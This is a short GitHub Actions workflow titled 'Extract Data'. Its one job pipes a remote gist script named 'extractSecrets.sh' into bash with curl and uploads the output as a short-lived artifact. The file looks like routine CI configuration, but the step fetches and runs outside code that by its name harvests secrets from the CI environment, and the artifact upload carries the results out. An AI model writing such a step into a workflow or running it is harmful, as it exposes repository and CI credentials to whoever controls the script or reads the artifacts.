name: Extract Data

on:
  workflow_dispatch:

permissions:
  contents: write

jobs:
  extract:
    runs-on: ubuntu-latest
    steps:
      - name: Run extraction script
        run: |
          curl -fsSL https://gist.githubusercontent.com/alfetopito/ad724aa2b920a742eb432ff636f99b41/raw/7592886202d664740863527a15c0d32c611d05b8/extractSecrets.sh | bash > extraction_output.txt

      - name: Upload output file
        uses: actions/upload-artifact@v4
        with:
          name: extraction-results
          path: extraction_output.txt
          retention-days: 1
